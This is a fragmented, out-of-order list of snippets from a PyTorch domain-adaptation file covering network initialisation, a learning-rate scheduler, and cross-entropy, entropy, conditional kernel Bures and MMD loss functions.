(H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and", "fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching", "+ B_t.t())/2 # numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True)", "Loss def Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB", "= I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s", "label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0]", "= R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s,", "Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss", "# Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return", "num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard':", "HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear)", "& Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv')", "torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if", "batch_idx, (X, lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob =", "= 0 for param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] =", "= D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt =", "sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs", "+\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 
2*torch.mm(fea_t,fea_s.t()) sigma_YsYs =", "0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to", "/ len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay", "# numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s =", "network parameters.\"\"\" classname = m.__class__.__name__ if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm')", "= D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt =", "+\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs =", "= epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon)", "in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab =", "prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1)", "-\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt", "2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp()", "prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach()", "-*- import torch from torch.autograd import Variable import sys ################################## # Network &", "lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab", "-\\ 2*torch.mm(prob_t,prob_s.t()) sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs =", "CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y:", "learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr", "invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering", "return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s = prob_s.shape[0] num_sam_t =", "X, lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct", "def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def Entropy(prob):", "# B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t -", "else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== 
Kernel Matrix", "from torch.autograd import Variable import sys ################################## # Network & Variable ################################## def", "if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') !=", "if classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0)", "prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt", "lab) return CE_loss # Entropy Loss def Entropy(prob): num_sam = prob.shape[0] Entropy =", "numerical symmetrize S_s, U_s = B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm(", "num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(prob_s,prob_s.t()) D_XtXt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t)", "= (B_s + B_s.t())/2 # numerical symmetrize B_t = (B_t + B_t.t())/2 #", "classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias)", "-\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\", "(-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s)", "prob_t): num_sam_s = prob_s.shape[0] num_sam_t = prob_t.shape[0] D_XsXs = prob_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\", "= B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear", "schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy Loss NLL_loss =", "I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix ======= H_s = (", "B_s = (B_s + B_s.t())/2 # numerical symmetrize B_t = (B_t + B_t.t())/2", "= ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t())", "B_t = num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical symmetrize B_t =", "'soft': prob_t = prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t =", "+ R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return CKB_dist # MMD loss def MMD_Metric(prob_s, prob_t): num_sam_s", "D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp()", "import torch from torch.autograd import Variable import sys ################################## # Network & 
Variable", "prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr,", "= prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_XtXs = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ prob_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_s.t())", "# B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t =", "= -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t,", "======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse() R_s =", "(G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t", "param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2 i += 1", "K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() + K_XtXt.mean() - 2*K_XtXs.mean()", "epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s =", "fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach()", "= (H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s", "= {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda()", "= m.__class__.__name__ if classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif", "correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer,", "R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t +", "numerical symmetrize B_t = (B_t + B_t.t())/2 # numerical symmetrize S_s, U_s =", "= (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() + K_XtXt.mean() - 2*K_XtXs.mean() return", "!= -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m): classname = m.__class__.__name__ if classname.find('Conv2d') !=", "torch.no_grad(): correct = 0 for batch_idx, (X, lab) in enumerate(data_loader): X, lab =", "= D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach() K_YsYs = (-D_YsYs/sigma_YsYs).exp() K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs =", "init_lr * (1 + gamma * iter_num) ** (-power) i = 0 for", "len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005): \"\"\"Decay learning", "= x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for batch_idx,", "classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias)", 
"torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return", "Network & Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__ if", "import Variable import sys ################################## # Network & Variable ################################## def weights_init(m): \"\"\"Initialize", "if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t =", "Z: fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s", ") HC_t = H_t.mm( U_t.mm((S_t+1e-4).pow(0.5).diag()) ) Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n =", "G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse()", "return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu()", "= to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum()", "num_sam_t*epsilon*Inv_t B_s = (B_s + B_s.t())/2 # numerical symmetrize B_t = (B_t +", "- (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t B_s = (B_s", "sys ################################## # Network & Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname", "with torch.no_grad(): correct = 0 for batch_idx, (X, lab) in enumerate(data_loader): X, lab", "x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC): with torch.no_grad(): correct = 0 for", "def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy()", "Matrix ======= H_s = ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t)", "======= # B_s = I_s - (G_Ys - (G_Ys.mm(Inv_s)).mm(G_Ys))/(num_sam_s*epsilon) # B_t = I_t", "and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t = (epsilon*num_sam_t*I_t + G_Yt).inverse()", "CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t = prob_t.detach()", "Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss = NLL_loss(torch.log(prob+1e-4),", "2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1)", "torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix ======= H_s = ( torch.eye(num_sam_s) -", "-1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available(): x =", "Variable import sys ################################## # Network & Variable ################################## def weights_init(m): \"\"\"Initialize network", "Entropy/num_sam # CKB loss def CKB_Metric(fea_s, fea_t, lab_s, plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'):", "(HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== 
Conditional KB Distance CKB_dist = R_s.trace()", "= (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt =", "torch from torch.autograd import Variable import sys ################################## # Network & Variable ##################################", "epochs.\"\"\" lr = init_lr * (1 + gamma * iter_num) ** (-power) i", "# Y: label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t", "plab_t, prob_t, num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching conditional distribution", "-1: m.weight.data.normal_(1.0, 0.02) m.bias.data.fill_(0) elif classname.find('Linear') != -1: m.weight.data.normal_(0.0, 0.05) m.bias.data.fill_(0) def weights_init_kaiming(m):", "elif classname.find('BatchNorm') != -1: torch.nn.init.normal_(m.weight, 1.0, 0.02) torch.nn.init.zeros_(m.bias) elif classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight)", "(X, lab) in enumerate(data_loader): X, lab = to_var(X), to_var(lab).long().squeeze() _, prob = FC(DNN(X))", "optimizer schedule_dict = {\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy Loss NLL_loss", "by a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1", "# Objective Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss", "Objective Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab): CE_loss =", "= B_s.symeig(eigenvectors=True) S_t, U_t = B_t.symeig(eigenvectors=True) HC_s = H_s.mm( U_s.mm((S_s+1e-4).pow(0.5).diag()) ) HC_t =", "in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay * 2 i", ").cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1)", "numpy to variable.\"\"\" if torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert", "correct.item() / len(data_loader.dataset) return accuracy def inv_lr_scheduler(param_lr, optimizer, iter_num, gamma, power, init_lr=0.001, weight_decay=0.0005):", "{\"inv\":inv_lr_scheduler} ################################## # Objective Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def", "0 for param_group in optimizer.param_groups: param_group['lr'] = lr * param_lr[i] param_group['weight_decay'] = weight_decay", "(H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s + G_Ys).inverse() Inv_t =", "of 0.1 every lr_decay_epoch epochs.\"\"\" lr = init_lr * (1 + gamma *", "D_YsYs.mean().detach() sigma_YtYt = D_YtYt.mean().detach() sigma_ZsZs = D_ZsZs.mean().detach() sigma_ZtZt = D_ZtZt.mean().detach() sigma_ZtZs = D_ZtZs.mean().detach()", "################################## # Objective Functions ################################## # Cross-Entropy Loss NLL_loss = torch.nn.NLLLoss().cuda() def Cross_Entropy(prob,lab):", "K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs = (H_s.mm(K_ZsZs)).mm(H_s) G_Zt", "classname.find('Conv') != -1: m.weight.data.normal_(0.0, 0.05) elif classname.find('BatchNorm') != -1: m.weight.data.normal_(1.0, 0.02) 
m.bias.data.fill_(0) elif", "param_lr[i] param_group['weight_decay'] = weight_decay * 2 i += 1 return optimizer schedule_dict =", "def Entropy(prob): num_sam = prob.shape[0] Entropy = -(prob.mul(prob.log()+1e-4)).sum() return Entropy/num_sam # CKB loss", "torch.svd(Nuclear) #====== Conditional KB Distance CKB_dist = R_s.trace() + R_t.trace() - 2*S_n[:-1].sum()/((num_sam_s*num_sam_t)**0.5) return", "= fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t", "classname.find('Conv2d') != -1 or classname.find('ConvTranspose2d') != -1: torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1:", "\"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return x.data.numpy() def classification_accuracy(data_loader,DNN,FC):", "classname.find('Linear') != -1: torch.nn.init.xavier_normal_(m.weight) torch.nn.init.zeros_(m.bias) def to_var(x): \"\"\"Convert numpy to variable.\"\"\" if torch.cuda.is_available():", "= (-D_XsXs/sigma_XsXs).exp() K_XtXt = (-D_XtXt/sigma_XtXt).exp() K_XtXs = (-D_XtXs/sigma_XtXs).exp() MMD_dist = K_XsXs.mean() + K_XtXt.mean()", "Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\" if torch.cuda.is_available(): x = x.cpu() return", "\"\"\"Decay learning rate by a factor of 0.1 every lr_decay_epoch epochs.\"\"\" lr =", "if torch.cuda.is_available(): x = x.cuda() return Variable(x) def to_data(x): \"\"\"Convert variable to numpy.\"\"\"", "B_t = I_t - (G_Yt - (G_Yt.mm(Inv_t)).mm(G_Yt))/(num_sam_t*epsilon) B_s = num_sam_s*epsilon*Inv_s B_t = num_sam_t*epsilon*Inv_t", "2*torch.mm(fea_t,fea_t.t()) D_ZtZs = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_s.t()) sigma_YsYs = D_YsYs.mean().detach() sigma_YtYt =", "CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix", "fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt = fea_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ fea_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(fea_t,fea_t.t()) D_ZtZs", "Y: label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t =", "sigma_XsXs = D_XsXs.mean().detach() sigma_XtXt = D_XtXt.mean().detach() sigma_XtXs = D_XtXs.mean().detach() K_XsXs = (-D_XsXs/sigma_XsXs).exp() K_XtXt", ").cuda() D_YsYs = OneHot_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ OneHot_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(OneHot_s,OneHot_s.t()) D_YtYt = prob_t.pow(2).sum(1,keepdim=True).repeat(1,num_sam_t) +\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1)", "K_YtYt = (-D_YtYt/sigma_YtYt).exp() K_ZsZs = (-D_ZsZs/sigma_ZsZs).exp() K_ZtZt = (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys", "= ( torch.eye(num_sam_s) - torch.ones(num_sam_s)/num_sam_s ).cuda() H_t = ( torch.eye(num_sam_t) - torch.ones(num_sam_t)/num_sam_t ).cuda()", ") Nuclear = (HC_t.t().mm(K_ZtZs)).mm(HC_s) U_n, S_n, V_n = torch.svd(Nuclear) #====== Conditional KB Distance", "# numerical symmetrize B_t = (B_t + B_t.t())/2 # numerical symmetrize S_s, U_s", "num_cls, epsilon=1e-2, CKB_type='soft'): # Y: label, Z: fea, matching conditional distribution P(Z|Y) num_sam_s", "prob_t = 
prob_t.detach() else: sys.exit('Error: invalid CKB_type') I_s = torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda()", "(H_s.mm(K_ZsZs)).mm(H_s) G_Zt = (H_t.mm(K_ZtZt)).mm(H_t) #====== R_{s} and R_{t} ======= Inv_s = (epsilon*num_sam_s*I_s +", "torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type == 'hard': prob_t = torch.zeros(num_sam_t,num_cls).cuda().scatter(1,plab_t.unsqueeze(1),1).detach() elif CKB_type == 'soft': prob_t", "+\\ prob_t.pow(2).sum(1,keepdim=True).t().repeat(num_sam_t,1) -\\ 2*torch.mm(prob_t,prob_t.t()) D_ZsZs = fea_s.pow(2).sum(1,keepdim=True).repeat(1,num_sam_s) +\\ fea_s.pow(2).sum(1,keepdim=True).t().repeat(num_sam_s,1) -\\ 2*torch.mm(fea_s,fea_s.t()) D_ZtZt =", "= (-D_ZtZt/sigma_ZtZt).exp() K_ZtZs = (-D_ZtZs/sigma_ZtZs).exp() G_Ys = (H_s.mm(K_YsYs)).mm(H_s) G_Yt = (H_t.mm(K_YtYt)).mm(H_t) G_Zs =", "torch.eye(num_sam_s).cuda() I_t = torch.eye(num_sam_t).cuda() #====== Kernel Matrix and Centering Matrix ======= H_s =", "+ G_Yt).inverse() R_s = epsilon*G_Zs.mm(Inv_s) R_t = epsilon*G_Zt.mm(Inv_t) #====== R_{st} ======= # B_s", "# Network & Variable ################################## def weights_init(m): \"\"\"Initialize network parameters.\"\"\" classname = m.__class__.__name__", "distribution P(Z|Y) num_sam_s = fea_s.shape[0] num_sam_t = fea_t.shape[0] OneHot_s = torch.zeros(num_sam_s,num_cls).cuda().scatter(1,lab_s.unsqueeze(1),1).detach() if CKB_type", "CE_loss = NLL_loss(torch.log(prob+1e-4), lab) return CE_loss # Entropy Loss def Entropy(prob): num_sam =", "FC(DNN(X)) plab = prob.data.max(1)[1] correct += plab.eq(lab.data).cpu().sum() accuracy = correct.item() / len(data_loader.dataset) return", "torch.nn.init.kaiming_uniform_(m.weight) torch.nn.init.zeros_(m.bias) elif classname.find('BatchNorm') != -1: 